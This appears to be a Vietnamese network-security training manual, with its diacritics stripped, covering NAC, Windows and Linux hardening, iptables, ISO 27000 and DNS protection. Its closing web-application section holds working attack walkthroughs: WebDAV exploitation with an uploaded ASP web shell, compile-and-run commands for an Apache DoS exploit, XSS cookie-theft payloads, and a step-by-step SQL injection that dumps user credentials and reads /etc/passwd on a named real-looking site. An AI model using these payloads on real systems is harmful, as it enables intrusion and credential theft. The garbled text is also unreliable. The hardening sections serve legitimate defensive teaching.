CTA giao tip vi cc phn mm khc trn my client qua Application Program Interface (API) v
tr li v tnh trng ca mnh t cc yu cu ca NAD. CTA l yu cu cn thit giao tip trong
qu trnh trin khai NAC (CTA giao tip vi NAC s dng EAP qua giao thc UDP). Mt phn
mm bao gm mt Posture Plug-In (PP) to nn giao din cho CTA. PP l mt tc nhn c thc
hin trn mt phn mm t cc nh sn xut khc c tc dng thc hin cc chnh sch v trng
thi ca phn mm .
Hin ti vic trin khai NAC th NAD l phn mm Layer 3 Cisco IOS trong cc thit b dng
truy vn cc my client tm kim v kim sot tnh hnh s dng EAP qua giao thc UDP (EAP
over UDP - EOU). Phng php ny khc vi cc thnh phn ca gii php NAC c th hin
hnh di y:
Hnh:
hin
th
cch
NAC vi cc thnh phn lm vic vi nhau:
thc
NAC
lm
vic
1. Client gi mt gi tin ti mt NAC-enabled router.

2. NAD bt u c thc hin ph chun qu trnh vi vic s dng EOU.
3. Client gi mt thng ip vi kh nng xc thc m bo c s ph chun ca NAD s dng
EOU ti NAD.
4. NAD gi thng ip ti Cisco ACS s dng giao thc xc thc RADIUS.
5. Cisco Secure ACS yu cu c s ph chun c s dng qua giao thc Host Credential
Authorization Protocol (HCAP) trong mt HTTPS tunnel.
6. Thng ip t my ch c gi i tr li cho yu cu l: pass, fail, quarantine.
7. cho php hay cm truy cp vo mng, Cisco Secure ACS gi mt thng ip ng vi
ACLs/URL.
8. NAD chuyn thng ip cho client.
6, 2012
9. Client s c php truy cp hay b cm truy cp.

Khi mt client gi mt yu cu truy cp vo mng (1),NAD c thc hin chuyn thng ip
"yu cu cn c ph chun" (2). Sau c gi n CTA sau khi nhn c s chuyn n
Cisco Secure ACS, v sau mt phin Protect EAP (PEAP) c thc hin t CTA sau gi
kim tra t cch ca client xem c ng tin cy hay khng c thc hin t PPs trn my
client ti NAD (3), chng c chuyn n Cisco Secure ACS qua giao thc RADIUS (4). Vic
thm nh xem client c ng tin cy khng bng cch ly cc thng tin v trng thi ca phn
mm c ci trn my client. Cisco Secure ACS kim tra v thm nh kh nng tin tng bng
cch kim tra trng thi ca client vi cc chnh sch c to ra trong c s d liu ca n.
Cisco Secure ACS cng c th cu hnh chuyn yu cu thm nh n mt my ch khc
cho vic thm nh (5). Qu trnh lm vic s dng HCAP trn mt HTTPS tunnel. N c th l
mt tu chn trong phn mm ca client vi mt PP v mt my ch dng thm nh v tnh
trng ca my client.
Khi mt my ch bn ngoi dng vo vic thm nh tnh xc thc cho qu trnh ng nhp ca
my client sau s gi thng ip thm nh ti Cisco Secure ACS. Cisco ACS sau tng
hp ton b cc chnh sch ti v cc chnh sch c kim tra trn my ch sau tr li
thng tin c tng hp cho Client. Cisco Secure ACS sau gi thng tin Access Control List
(ACL) cho NAD cung cp cc chnh sch cho client (8).
15. Bo mt h iu hnh
a. Bo mt cho h iu hnh Windows
S dng phn cng an ton
Hin nay c rt nhiu phn cng nh RAM, USB, Keylogger, HDD cho php n
trm d liu ca ngi dng, vic la chn phn cng chnh hng c xut s r
rng l v cng quan trng cho mi nn tng.
S dng Windows c bn quyn
S dng h iu hnh Windows c bn quyn cho php cp nht cc bn v li v
nhn c s h tr trc tip t hng s lm cho h thng ca bn an ton hn.
Thit lp t ng Upgrade
Nn thit lp t ng Upgrade c th v cc l hng bo mt
Thit lp tng la cho my tnh
6, 2012
Tng la trn my tnh cho php bo v my tnh trc cc mi him ha nh tn

cng l hng bo mt, bng n ca wormChng ta nn bt tnh nng tng la
v thit lp ch nhng ng dng v port no chng ta bit th mi m.
Lab: thit lp tng la cho my my tnh
Thit lp mt khu kh vi cc User.
Ngi dng c thi quen t mt khu n gin i khi cng l con ng tn cng
khai thc ca cc ti phm mng. Cn thit lp Password ca vWindows ti thiu l
7 k t bao gm: S, ch Hoa, ch thng, k t c bit.
Lab: Thit lp User Account Policy cho my tnh
M ha cng vi tnh nng Bitlocked ca Microsoft
H iu hnh vWindows t Vista tr nn cho php bn m ha ton b cng, iu
ny gip bn trnh tht thot d liu khi b mt my tnh, v chng c b kha
my tinh.
Ch ci t cc phn mm c xut x r rng
Tt tt c cc dch v v ng dng khng cn thit
iu ny cng gip bn gim thiu kh nhiu cc nguy c b tn cng vo my tnh
Ci t cc chng trnh bo v (Endpoint Security)
Cc chng trnh bo v nh Kaspersky, Symantec, Trend gip bn gim st ton
b h thng my tnh t cc qu trnh I/O, c ghi d liu, hay cc truy cp mng.
Hu ht cc nguy c i vi h thng Endpoint s c pht hin bi cc phn
mm ny.
S dng cc dch v mng an ton
Vic trao i thng tin bng cc giao thc thiu an ton nh telnet, pop3, smtp, ftp,
http s dn ti vic Username/Password ca bn s b mt. Vic la chn cc
giao tip mng an ton cng l iu v cng quan trng bo v h thng my
tnh.
Thit lp IPsec cho cc dch v mng thiu an ton.
Khi s dng cc dch v thiu an ton khi thng tin truyn trn mng, bn hon
ton c th s dng tnh nng Ipsec m ha thng tin truyn trn mng. Ipsec
m bo d liu ca bn s lun c an ton
To Group Policy trn ton Domain m bo thng nht chnh sch s dng
6, 2012
S dng My tnh trong mi trng an ton

Thi quen truy cp Internet an ton v c y cc gii php bo v.
b. Lab: S dng Ipsec Policy bo v mt s ng dng trn Windows
c. Bo v cho h iu hnh Linux
S dng phin bn Linux c phn phi bi mt t chc uy tn nh Red Hat,
Ubuntu v mt vi nh phn phi khc.
S dng nhn Linux phin bn mi nht
Khi trin khai ci t dch v mi cn kim tra dch v c nhng l hng g c
th xy ra.
S dng cc phn mm bo mt khc ci t trn my tnh Linux (Anti-Virus,
IDS/IPS, Firewall).
Sau y ti trnh by s lc v s dng Iptable bo v my tnh Linux
Firewall IPtable trn Redhat
Phin bn nhn Linux version 2.2.x c a ra vi rt nhiu tnh nng mi gip Linux
hot ng tin cy hn v h tr cho nhiu thit b. Mt trong nhng tnh nng mi ca n
l h tr Netfilter iptables ngay trong kernel, gip thao tc trn packet hiu qu hn so
vi cc ng dng trc nh ipfwadm trong kernel 2.0 v ipchains trong kernel 2.2, tuy
vn h tr cho cc b lnh c. Thit lp firewall theo kiu lc packet (packet filtering
lc gi thng tin) vi ipfwadm hoc ipchains c nhiu hn ch: thiu cc tch hp cn thit
m rng tnh nng, khi s dng lc packet cho cc giao thc thng thng v chuyn
i a ch mng (Network Address Translation - NAT) th thc hin hon ton tch bit
m khng c c tnh kt hp. Netfilter v iptables trn kernel 2.4 gii quyt tt cc hn
ch trn v c thm nhiu tnh nng khc m Ipfwadm v Ipchains khng c.
Gii thiu v IPtables
Trong h thng Linux c rt nhiu firewall. Trong c mt s firewall c cu hnh v
hot ng trn nn console rt nh v tin dng l Iptable v Ipchain.
Netfilter/IPtables
Gii thiu
Iptables do Netfilter Organiztion vit ra tng tnh nng bo mt trn h thng Linux.
Iptables l mt tng la ng dng lc gi d liu rt mnh, c sn bn trong kernel Linux
2.2.x v 2.6.x. Netfilter/Iptable gm 2 phn l Netfilter trong nhn Linux v Iptables nm
6, 2012
ngoi nhn. IpTables chu trch nhim giao tip gia ngi dng v Netfilter y cc
lut ca ngi dng vo cho Netfilter x l. Netfilter tin hnh lc cc gi d liu mc
IP. Netfilter lm vic trc tip trong nhn, nhanh v khng lm gim tc ca h thng.
c thit k thay th cho linux 2.2.x Ipchains v linux 2.0.x ipfwadm v c nhiu c
tnh hn Ipchains v n c xy dng hp l hn vi nhng im sau:
Netfilter/Iptables c kh nng g?
Xy dng bc tng la da trn c ch lc gi stateless v stateful
Dng bng NAT v masquerading chia s s truy cp mng nu khng c a ch mng.
Dng bng NAT ci t transparent proxy Gip cc h thng tc v iproute2 to cc
chnh sch router phc tp v QoS. Lm cc thay i cc bit(mangling) TOS/DSCP/ECN
ca IP header.
C kh nng theo di s kt ni, c kh nng kim tra nhiu trng thi ca packet. N lm
vic ny cho UDP v ICMP tt nht l kt ni TCP, v d tnh trng y ca lc ICMP
ch cho php hi m khi c yu cu pht i, ch khng chn cc yu cu nhng vn chp
nhn hi m vi gi s rng chng lun p li lnh ping. S hi m khng do yu cu c
th l tn hiu ca s tn cng hocca sau. X s n gin ca cc packet tho thun
trong cc chains (mt danh sch cc nguyn tc) INPUT, OUTPUT, FORWARD. Trn cc
host c nhiu giao din mng, cc packet di chuyn gia cc giao din ch trn chain
FORWARD hn l trn 3 chain.
Phn bit r rng gia lc packet v NAT (Nework Address Translation)
C kh nng gii hn tc kt ni v ghi nht k. Bn c th gii hn kt ni v ghi nht k t
trnh s tn cng t chi dch v (Deinal of service).C kh nng lc trn cc c v a ch vt
l ca TCP. L mt firewall c nhiu trng thi, nn n c th theo di trong sut s kt ni, do
n an ton hn firewall c t trng thi.Iptables bao gm 4 bng, mi bng vi mt chnh sch
(police) mc nh v cc nguyn tc trong chain xy dng sn.
Ipchain
Mt trong nhng phn mm m Linux s dng cu hnh bng NAT ca kernel l Ipchain. Bn
trong chng trnh Ipchain c 2 trnh kch bn (scrip) chnh c s dng n gin ha cng
tc qun tr Ipchains.Ipchain c dng ci t, duy tr v kim tra cc lut ca Ip firewall trong
Linux kernel. Nhng lut ny c th chia lm nhm chui lut khc nhau l:
Ip Input chain (chui lut p dng cho cc gi tin i n firewall).
Ip Output chain (chui lut p dng cho cc gi tin c pht sinh cc b trn firewall v i ra
khi firewall).
6, 2012
Ip forwarding chain (p dng cho cc gi tin c chuyn tip ti my hoc mng khc qua
firewall). V cc chui lut do ngi dng nh ngha (user defined).
Ipchains s dng khi nim chui lut (chain ) x l cc gi tin. Mt chui lut l mt danh
sch cc lut dng x l cc gi tin c cng kiu l gi tin n, gi tin chuyn tip hay gi tin
i ra.Nhng lut ny ch r hnh ng no c p dng cho gi tin. Cc lut c lu tr trong
bng NAT l nhng cp a ch IP ch khng phi tng a ch IP ring l.
Mt lut firewall ch ra cc tiu chun packet v ch n. Nu packet khng ng lut k tip
s c xem xt, nu ng th lut k tip s ch nh r gi tr ca ch c th cc chain do ngi
dng nh ngha hay c th l mt trong cc gi tr c th sau: ACCEPT, DENY, REJECT, MASQ
REDICRECT hay RETURN.
Tng t nh DENY nhng c tr li cho client bit gi tin b hy b.
dng khi kernel c bin dch vi CONFIG_IP_MASQUERADE. Vi chain ny packet s c

masquerade nh l n c sinh ra t my cc b, hn th na cc packet ngc s c nhn ra
v chng s c demasqueraded mt cch t ng, b qua forwarding chain.
c
dng
khi
Linux
kernel
c
bin
dch
vi
tham
s
CONFIG_IP_TRANSPARENT_PROXY c nh ngha. Vi iu ny packets s c chuyn
ti socket cc b, thm ch chng c gi n host xa. Mt s c php hay c s dng:
Ipchains [ADC] chain rule-specification [options]
Ipchains [RI] chain rulenum rule-specification
[options]
Ipchains D chain rulenum [options]
Ipchains [LFZNX] [chain] [options] Ipchains P chain target [options]
Ipchains M [-L | -S] [options]
6, 2012
16. Chnh sch an ninh mng.

a. Yu cu xy dng chnh sch an ninh mng.
Nu Security cho h tng mng bao gm 4 mng:
-
L thuyt v Security
K nng tn cng
K nng cu hnh phng th
Lp chnh sch an ton thng tin
Xy dng chnh sch an ninh mng l bc hon thin mt mi trng lm vic v hot ng
theo chun bo mt. Hin nay nc ta c rt nhiu n v ang xy dng chnh sch bo mt
theo chun ISO 27001, s dng m hnh ISMS.
b. Quy trnh tng quan xy dng chnh sch tng quan:
Plan
Xc nh mc tiu
Xc nh v nh lng ri ro an ton thng tin
Xc nh cc yu cu cn tun th
Xy dng chnh sch
Do
Thit k h thng
Trin khai cc chnh sch/bin php bo v h tng
Ci t an ton h thng my ch
Ci t an ton h thng my trm
Ci t cc ng dng bo v an ton thng tin

Check
Kim tra v nh gi an ton thng tin
Gim st v kim ton h thng trong qu trnh hot ng
Act
Duy tr h thng
Nng cp nu cn thit
Hnh v th hin vng xoy Plan-Do-Check-Act
c. H thng ISMS
M hnh h thng ISMS
6, 2012
6, 2012
d. ISO 27000 Series

Khi nhc n ISMS ngi ta phi ni n b tiu chun ISO/IEC 27000 series ch khng phi l
mt ring mt tiu chun no c th.
B tiu chun 27000 c 21 tiu chun, nhng t tng chnh nm ISO/IEC27001 - ci tin lin
tc.
B tiu chun ISO 27000 bao gm
* ISO/IEC 27000 ISMS Tng qut v t vng.
* ISO/IEC 27001 ISMS Yu cu
* ISO/IEC 27002 Chun mc thc hin ISMS
* ISO/IEC 27003 Hng dn trin khai ISMS
* ISO/IEC 27004 o lng ISM
* ISO/IEC 27005 Qun l ri ro IS
* ISO/IEC 27006 Yu cu v t chc nh gi v chng nhn ISMS
* ISO/IEC 27011 Hng dn ISM cho t chc vin thng.
6, 2012
* ISO 27799 - ISM trong y t s dng ISO/IEC 27002

* ISO/IEC 27007 - Hng dn nh gi ISMS
* ISO/IEC 27008 - Hng dn cho chuyn gia nh gi v ISMS controls
* ISO/IEC 27013 - Hng dn tch hp trin khai ISO/IEC 20000-1 v ISO/IEC 27001
* ISO/IEC 27014 - Khung qun l IS
* ISO/IEC 27015 - Hng dn ISM cho ti chnh v bo him
* ISO/IEC 27031 - Hng dn mc sn sng ICT cho BCM
* ISO/IEC 27032 - Hng dn cybersecurity
* ISO/IEC 27033 - IT network security
* ISO/IEC 27034 - Hng dn application security
* ISO/IEC 27035 - Qun l security incident.
* ISO/IEC 27036 - Hng dn bo mt s dng trong outsourcing
* ISO/IEC 27037 - Hng dn xc nh, thu thp v/hoc thu nhn v bo qun cc bng chng
s.
Trong s ri ny c mt s tiu chun khng c cp (v d ISO27012 cho egovernment) l do
nguyn nhn cc tiu chun ny cha nh hnh, hoc cha iu kin nng cp ln thnh tiu
chun do U ban k thut ca ISO v IEC quyt nh.
Ngoi ra hai tiu chun 27033 v 27034 c cc tiu chun con tng ng hay cn gi l cc phn
nh 27033-1, 27034-5.
Lm ISMS bt u t u???
Lm ISMS phi bt u t vic hc t ng (ISO27000) s dng trong ISMS thng nht cch
hiu, t duy, din t v trnh by. Trnh trng hp mt t b din gii thnh nhiu ngha lch
lc. Tuy nhin, v l do thi gian, tin bc, v k c... kiu ngo m nhiu n v thng b qua
bc ny.
Cu tr li thng thng khi ngi t vn yu cu trin khai hc v t vng l: "Ci ny d, t
c l c ri" nhng thc t khng my ai c. Hn na mc ch chnh khng phi l hiu t
vng m cho ton b nhn vin c cch hiu ging nhau.
Chnh v vy m khi lm ISMS cc n v thng b tht bi v c tnh hnh thc v quan im v
cch hiu ca mi ngi, mi cp trong t chc l khc nhau. Nhng ngi mi vo cng khng
6, 2012
c hc nn dn dn khi m turnover ca employee cao th cch t duy v nh hng khng cn

c nh ban u.
ISMS c cn chng nhn khng? V ti sao?
ISMS khng cn phi chng nhn, khng c ch no trong b tiu chun quy nh phi chng
nhn ISMS c. Vic chng nhn ISMS l t nguyn.
Nhiu n v a ra chng ch ISMS "h" ngi khc, nhng thc t ngi nm r tiu chun
th thy chuyn rt hi hc.V ISMS ch th hin cam kt ch khng th hin gi tr.
Gi tr chng nhn ISMS nm u?
ISMS nm uy tn ca t chc chng nhn v chuyn gia nh gi. Trong lnh vc ny, c nhiu
chuyn gia nh gi c chuyn mn su cn km hn c nhn vin ca n v. Do 27006 27008 quy nh v vic nh gi.
Cng v l do m nhng tp on cng ty ln khng cn chng nhn ISMS m h t nh gi
nu bn thn h c nhng chuyn gia gii.
Sau khi hc 27000 th lm g??
Thng thng khi auditor i nh gi thng da vo 27001. Nu trin khai ISMS ch i ph
th ch cn tp trung vo 27001 l v cng chng cn hc 27000 lm g.
Nu thc s trin khai th tp trung vo 27002:
Risk assessment
Security policy
Organization of information security
Asset management
Human resources security
Physical and environmental security
Communications and operations management
Access control
Information
systems
acquisition,
development
and
maintenance
10. Information security incident management

Business continuity management
Compliance
Trin khai 12 ci code of practice ca 27002 nh th no?
Khi trin khai 27002 s phi bt u chu k lp i lp li ca 12 im ni trn tc l 12 im trn
phi c xy dng i xy dng li.
6, 2012
Vic xy dng ny da trn 27003:
Introduction
Scope
Terms & Definitions
Structure of this Standard
5. Obtaining Management Approval for Initiating the Project to Implement an ISMS
6. Defining ISMS Scope and ISMS Policy
7. Conducting Organization Analysis
8. Conducting Risk Assessment and Risk Treatment Planning
9. Designing the ISMS
Nhn b ngoi th y dng nh l ch l vn qun l, nhng trn thc t phn Oganization

Analysis vn cn thiu cc mt xch quan trng trong b tiu chun v ISO/IEC ang xy
dng. l l do khng t ngi lm tng ISMS ch thin v qun l. C nhn ti c mt
thi gian sai lm trong chuyn ny.
AN TON NG DNG
IV.
1. Bo mt cho ng dng DNS

H thng tn min (DNS) c s dng xc nh t tn my ch n nhng a ch IP trn
Internet v trn mng c nhn nn tng TCP/IP. My ch DNS thng l mc tiu m tin tc khai
thc v tn cng, tuy nhin bn cng c th bo mt cho nhng my ch ny bng mt s phng
php sau:
a. S dng DNS Forwarder
DNS Forwarder (Trnh chuyn tip) l mt my ch DNS thc hin truy vn DNS thay cho
nhiu my ch DNS khc. DNS Forwarder c s dng g b nhng tc v ang x l khi
nhng my ch DNS ang thc hin chuyn tip
nhng truy vn ny sang Forwarder, v tng lu lng
b nh m DNS trn DNS Forwarder.
Mt chc nng khc ca DNS Forwarder l
6, 2012
ngn cn my ch DNS chuyn tip yu cu trong khi tng tc vi nhng my ch DNS trn
Internet. y l chc nng c bit quan trng v khi my ch DNS cha ti nguyn bn trong
min DNS. Thay v cho php nhng my ch DNS ni b t thc hin gi li lnh v lin lc vi
nhng my ch DNS khc, n cu hnh cho my ch DNS ni b s dng mt Forwader cho tt c
cc min khng c phn quyn.
b. S dng my ch DNS lu tr.
My ch DNS lu tr l mt my ch DNS khng th phn quyn cho bt k min DNS

no. N c cu hnh thc hin gi li lnh hay s dng mt Forwarder. Khi my ch ny nhn
mt phn hi, n s lu kt qu v chuyn cu tr li n h thng gi truy vn DNS ti my ch
DNS lu tr. Sau , my ch ny c th tp hp nhiu phn hi DNS gip gim ng k thi
gian phn hi cho nhng my trm DNS ca my ch DNS lu tr.
Nhng my ch DNS lu tr c th ci thin bo mt cho cng ty khi c s dng nh mt

Forwarder trong nhm cng c qun tr ca bn. Nhng my ch DNS ni b c th c ci t
s dng my ch DNS lu tr nh trnh chuyn i ca chng, v my ch DNS lu tr thc
hin gi li lnh thay cho nhng my ch DNS ni b. Vic s dng nhng my ch DNS lu tr
nh nhng Forwarder c th ci thin bo mt bi v bn khng phi ph thuc vo nhng my
ch DNS ca nh cung cp c s dng nh Forwarder khi bn khng tin tng vo ci t bo
mt trn my ch DNS ca h.
c. S dng DNS Advertiser
DNS Advertiser (Trnh qung co) l mt my ch DNS thc hin truy vn cho nhng min
m DNS Advertiser c phn quyn. V d, nu bn lu tr ti nguyn cho domain.com v
corp.com, my ch DNS cng cng s c cu hnh vi vng file DNS cho min domain.com v
corp.com.
S khc bit gia DNS Advertiser vi my ch DNS cha vng file DNS l DNS
Advertiser tr li nhng truy vn t tn min m n phn quyn. My ch DNS s khng gi li
truy vn c gi ti nhng my ch khc. iu ny ngn cn ngi dng s dng my ch DNS
cng x l nhiu tn min khc nhau, v lm tng kh nng bo mt bng cch gim bt nhng
nguy c khi chy DNS Resolver cng cng (gy tn hi b nh m).
6, 2012
d. S dng DNS Resolver.
DNS Resolver (trnh x l) l mt my ch DNS c th gi li lnh x l tn cho nhng

min khng c my ch DNS phn quyn. V d, bn c th s dng mt my ch DNS c
phn quyn trong mng ni b cho min mng ni b internalcorp.com. Khi mt my trm trong
mng s dng my ch DNS ny t tn quantrimang.com, my ch DNS s gi li lnh
bng cch truy lc kt qu trn nhng my ch DNS khc.
S khc bit gia my ch DNS ny v DNS resolver l DNS Resolver c dng t

tn cho my ch Internet. Resolver c th l mt my ch DNS lu tr khng c phn quyn
cho bt k min DNS no. Admin c th ch cho php ngi dng ni b s dng DNS Resolver,
hay ch cho php ngi dng ngoi s dng cung cp bo mt khi s dng mt my ch DNS
bn ngoi ngoi tm kim sot ca admin, v c th cho php c ngi dng ni b v ngi dng
ngoi truy cp vo DNS Resolver.
e. Bo v b nh m DNS
nhim b nh m DNS l mt vn pht sinh chung. Hu ht my ch DNS c th

lu tr kt qu truy vn DNS trc khi chuyn tip phn hi ti my ch gi truy vn. B nh
m DNS c th ci thin ng k kh nng thc hin truy vn DNS. Nu b nh m my ch
DNS b nhim vi nhiu mc nhp DNS o, ngi dng c th b chuyn tip ti nhng
website c hi thay v nhng website d nh truy cp.
Hu ht my ch DNS c th c cu hnh chng nhim b nh m. V d. my ch

DNS Windows Server 2003 c cu hnh mc nh chng nhim b nh m. Nu ang s
dng my ch DNS Windows 2000, bn c th ci t chng nhim bng cch m hp thoi
Properties trong my ch DNS, chn tab Advanced, sau nh du hp chn Prevent Cache
Pollution v khi ng li my ch DNS.
f. Bo mt kt ni bng DDNS
Nhiu my ch DNS cho php cp nht ng. Tnh nng cp nht ng gip nhng my ch
DNS ny ng k tn my ch DNS v a ch IP cho nhng my ch DHCP cha a ch IP.
DDNS c th l mt cng c h tr qun tr hiu qu trong khi cu hnh th cng nhng mu ti
nguyn DNS cho nhng my ch ny.
Tuy nhin, vic khng kim tra nhng bn cp nht DDNS c th gy ra mt vn v bo

mt. Ngi dng xu c th cu hnh my ch cp nht ng nhng ti nguyn trn my ch DNS
6, 2012
(nh my ch d liu, my ch web hay my ch c s d liu) v nh hng kt ni ti my ch

ch sang PC ca h.
Bn c th gim nguy c gp phi nhng bn cp nhp DNS c hai bng cch yu cu bo

mt kt ni ti my ch DNS cp nht ng. iu ny c th d dng thc hin bng cch ci
t my ch DNS s dng nhng vng tng hp Active Directory v yu cu bo mt cp nht
ng. Tt c min thnh vin c th cp nht ng thng tin DNS mt cch bo mt sau khi thc
hin ci t.
g. Ngng chy Zone Transfer
Zone Transfer (vng chuyn i) nm gia my ch DNS chnh v my ch DNS ph.

Nhng my ch DNS chnh c phn quyn cho nhng min c th cha vng file DNS c th
ghi v cp nht khi cn thit. My ch DNS ph nhn mt bn sao ch c ca nhng vng file
ny t my ch DNS chnh. My ch DNS ph c s dng tng kh nng thc thi truy vn
DNS trong mt t chc hay trn Internet.
Tuy nhin, Zone Transfer khng gii hn my ch DNS ph. Bt c ai cng c th chy mt
truy vn DNS cu hnh my ch DNS cho php Zone Transfer kt xut ton b vng file c s
d liu. Ngi dng xu c th s dng thng tin ny thm d gin tn trong cng ty v tn
cng dch v cu trc h tng ch cht. Bn c th ngn chn iu ny bng cch cu hnh my
ch DNS t chi Zone Transfer thc hin yu cu, hay cu hnh my ch DNS cho php Zone
Transfer ch t chi yu cu ca mt s my ch nht nh.
h. S dng Firewall kim sot truy cp DNS
Firewall c th c s dng chim quyn kim sot i vi nhng ngi dng kt ni

my ch DNS. Vi nhng my ch DNS ch s dng cho nhng truy vn t my trm ni b,
admin cn phi cu hnh firewall chn kt ni t nhng my ch ngoi vo nhng my ch
DNS ny. Vi nhng my ch DNS c s dng nh Forwarder lu tr, firewall cn c cu
hnh ch cho php nhn nhng truy vn DNS t my ch DNS c s dng nh Forwarder lu
tr. Mt ci t firewall policy rt quan trng l chn nhng ngi dng ni b s dng giao
tip DNS kt ni vo nhng my ch DNS ngoi.
i. Ci t kim sot truy cp vo Registry ca DNS
6, 2012
Trn nhng my ch DNS nn tng Windows, kim sot truy cp cn c cu hnh trong
nhng ci t Registry lin quan ti my ch DNS cho php nhng ti khon c yu cu truy
cp c v thay i ci t ca Registry.
Key DNS trong HKLM\CurrentControlSet\Services cn c cu hnh ch cho php Admin

v ti khon h thng truy cp, ngoi ra nhng ti khon ny cn c cp quyn Full Control.
j. Ci t kim sot truy cp vo file h thng DNS
Trn nhng my ch DNS nn tng Windows, bn nn cu hnh kim sot truy cp trn file
h thng lin quan ti my ch DNS v vy ch nhng ti khon yu cu truy cp vo chng c
cho php c hay thay i nhng file ny.
Th mc %system_directory%\DNS v nhng th mc con cn c ci t ch cho php ti

khon h thng truy cp vo, v ti khon h thng cn c cp quyn Full Control.
2. Bo mt cho ng dng Web
a. Gii thiu
Thng thng Hacking 1 Web Server, Hacker thng phi xem th Web Server
ang chy h iu hnh g v chy nhng sercice g trn , h iu hnh thng thng l cc
h iu hnh Win 2000 Server, Win 2003 Server, Redhat.v.v. Cc Service bao gm Apache, IIS,
FTP Server v.v. Nu nh 1 trong nhng Service ca H iu hnh b li hay service khc
b li c th dn ti vic mt quyn kim sot ca h thng. Trong bi thc hnh ca phn ny,
tc gi gii thiu li ca h iu hnh l DCOM v li ng dng khc l Server-U,
Apache(FTP Server). T nhng li ny, ta c th kim sot hon ton my nn nhn.
b. Cc l hng trn dch v Web
-
L hng trn lp h iu hnh
L hng trn Web Services
L hng trn vWeb Application
6, 2012
c. Khai thc l hng bo mt tng h iu hnh v bo mt cho my ch Web

L hng trn h iu hnh vWindows hay Linux ch yu xy ra trn cc dch v truy cho
php truy cp t xa (RPC, SSH, Telnet)
Di y l report t chng trnh Nessus Scan h iu hnh
Khi c l hng bo mt mc high tr ln h thng hon ton c th b tn cng:
Attack thnh cng khai thc l hng bo mt MS08-067 ca Microsoft
6, 2012
6, 2012
Bo mt my ch vWeb layer OS
Thc hin cc bc bo mt cho h iu hnh phn trn ca ti liu ny c mt h
iu hnh an ton
d. Khai thc l hng trn Web Service
S dng Active Perl + Code khai thc file.pl + Shell download cc nhiu trn mng
khai thc l hng IIS WebDAV
Bc 1: Ci t Active Perl
Bc 2: Copy file tocbatdat.pl (file attack)
Bc 3: Upload Shell rhtools.asp
Bc 4: Truy cp vo my ch qua Shell
bo mt li ny cn phi s dng phin bn vWeb Service an ton.
6, 2012
6, 2012
e. Khai thc l hng DoS trn Apache 2.0.x-2.0.64 v 2.2.x 2.2.19

L hng ny kh nhiu my tnh trn Internet vn cn li, khi h thng c li ny cho php
hacker dng mt cu lnh c th lm treo dch v web. V hin nay cha c bn v li cho
l hng ny:
Bc 1: Download code t site: http://www.exploit-db.com/exploits/18221/
Bc 2: i file ny thnh file.c c tn l rcvalle-rapache.c
Bc 3: Bin dch file.c ny thnh file chy vi cu lnh trong linux
gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
Bc 4: chy file ny
Linux# ./rcvalle-rapache IP
f. Khai thc l hng trn Web Application

ng dng Web thng thng s dng d liu u vo trong cc truy cp HTTP (hoc trong
cc tp tin) nhm xc nh kt qu phn hi. Tin tc c th sa i bt k phn no ca mt
truy xut HTTP, bao gm URL, querystring, headers, cookies, form fields, v thm ch field
n (hidden fields), nhm vt qua cc c ch bo mt. Cc tn cng ph bin dng ny bao
gm:
Chy lnh h thng ty chn
Cross site scripting
Li trn b m
Tn cng Format string
SQL injection
Cookie poisoning
Sa i field n
Trong bi thc hnh ny, ta th khai thc cc l hng Cross Site Cripting, Format string,
Cookie Manipulation, Authorization Failure.
Cross Site Scripting
u tin ta login vo bng username jv v password jv789 v chn chc nng
post message. Sau ta post script vo phn message text.
Sau ta submit post script ny ln. Ta s dng F5 Refresh li trnh duyt v
thy xut hin.
6, 2012
Lc ny trnh duyt ca nn nhn v tnh thc hin script c user post ln Server. Da vo
script ny, tin tc c th n cp cookie ca nn nhn v log in vo h thng.
Cc cu lnh kim tra XSS:
"><script>alert('hey')</script>
http://ha.ckers.org/xss.html All Cheat Code XSS
"><script>exec(%systemroot%\system32\cmd.exe)</script>
"><script>while(1){alert('hey')}</script> Vo han
"><script>alert(document.cookie)</script>
LeapLastLogin=20090523152133;
PHPSESSID=28026127959bf076767f3adac1c736d5
Gii thiu v SQL Injection:
y l K thut tn cng ny li dng nhng l hng trn ng dng(khng kim tra k nhng k
t nhp t ngi dng). Thc hin bng cch thm cc m vo cc cu lnh hay cu truy vn
SQL (thng qua nhng textbox) trc khi chuyn cho ng dng web x l, Server. Thc hin v
tr v cho trnh duyt (kt qu cu truy vn hay nhng thng bo li) nh m cc tin tc c
th thu thp d liu, chy lnh (trong 1 s trng hp) v sau cho c th chim c quyn kim
sot ca h thng. Sau y l 1 s th thut cn bn.
VD Khai thc l hng SQL Injection ca MySQL v PHP
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1
Kim tra li trn website
Kim tra xem c bao nhiu trng: 1 order by 30
Kim tra trng li: 1 and 1=0 union select 1 and 1=0 union
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
Pht hin ra trng li l 4 thc hin bc tip theo:
Exploit
select
6, 2012
Bc 1: Show table
1
and
1=0
union
select
1,database(),3,group_concat(unhex(hex(table_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29 from information_schema.tables-- &catid=20
Bc 2: Show Column
group_concat(unhex(hex(column_name)))
http://www.tocbatdat.edu.vn/index.php?lg=1
and
1=0
union
select
1,database(),3,group_concat(unhex(hex(column_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29 from information_schema.columns where table_name=char(106,
111, 115, 95, 117, 115, 101, 114, 115)-- &catid=20
Bc 3: Get Database;
and
1=0
union
select
1,database(),3,group_concat(username,0x2f,password,0x2f,email,userType),5,6,7,8,9,10,11,12,13,
14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from jos_users-- &catid=20
Bc 4: Doc file he thong
and
1=0
union
select
1,database(),3,load_file(char(47, 101, 116, 99, 47, 112, 97, 115, 115, 119,
100)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- &catid=20
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1%20and%201=0%20union%20select
%201,2,3,4,group_concat%28TenDN,0x2f,MatKhau%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2
0,21,22%20from%20maxcare_tbadmin-3. An ton dch v Mail Server
a. Gii thiu tng quan v SMTP, POP, IMAP
a.1 Kin trc v hot ng ca th in t
Mun gi th in t ngi gi cn phi c mt account trn mt my ch th. Mt my ch c
